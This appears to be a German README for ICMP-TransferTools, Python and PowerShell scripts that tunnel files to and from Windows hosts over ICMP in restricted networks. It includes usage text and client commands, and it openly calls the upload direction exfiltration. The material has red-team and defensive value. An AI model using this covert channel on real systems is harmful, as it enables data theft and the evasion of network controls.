
Übertragen Sie Dateien zu und von einem Windows-Host über ICMP in eingeschränkten Netzwerkumgebungen.
ICMP-TransferTools ist eine Sammlung von Skripten, die entwickelt wurden, um Dateien in eingeschränkten Netzwerkumgebungen zu und von Windows-Hosts zu übertragen. Dies wird mit insgesamt 4 verschiedenen Dateien erreicht, bestehend aus einem Python-Server und einem PowerShell-Client für jede Übertragungsrichtung (Download & Upload).
Die einzige benötigte Abhängigkeit ist Impacket für eines der Python-Skripte. Es kann wie folgt über pip installiert werden:
pip3 install impacket
Die enthaltenen Skripte ICMP-SendFile.py und Invoke-IcmpDownload.ps1 können verwendet werden, um eine Datei über ICMP auf einen Windows-Host herunterzuladen.
Der Python-Server muss zuerst ausgeführt werden, um die Datei für den Download bereitzustellen. Unten sehen Sie die Verwendung des Skripts:
usage: ICMP-SendFile.py [-h] [-v] [-b 1000] source destination file
ICYGUIDER'S ICMP FILE DOWNLOAD SERVER
positional arguments:
source Public IP address of current host
destination Public IP address of destination host
file File to transfer over ICMP
optional arguments:
-h, --help show this help message and exit
-v, --verbose Verbosely print progress
-b 1000, --block-size 1000
Size of each block (Default: 1000)
Nach dem Import kann der PowerShell-Client dann verwendet werden, um die bereitgestellte Datei wie folgt herunterzuladen:
Invoke-IcmpDownload PublicIPAddressOfServer FileToDownload
Unten sehen Sie eine kurze Demonstration:

Die enthaltenen Skripte ICMP-ReceiveFile.py und Invoke-IcmpUpload.ps1 können verwendet werden, um eine Datei über ICMP von einem Windows-Host hochzuladen / zu exfiltrieren.
Der Python-Server muss zuerst ausgeführt werden, um sicherzustellen, dass er bereit ist, Anfragen vom Client zu akzeptieren. Unten sehen Sie die Verwendung des Skripts:
usage: ICMP-ReceiveFile.py [-h] src file
ICYGUIDER'S ICMP FILE UPLOAD SERVER
positional arguments:
src Public IP Address of client
file File to write data to
optional arguments:
-h, --help show this help message and exit
Nach dem Import kann der PowerShell-Client dann verwendet werden, um die gewünschte Datei wie folgt hochzuladen:
Invoke-IcmpUpload PublicIPAddressOfServer FileToUpload
Unten sehen Sie eine kurze Demonstration:
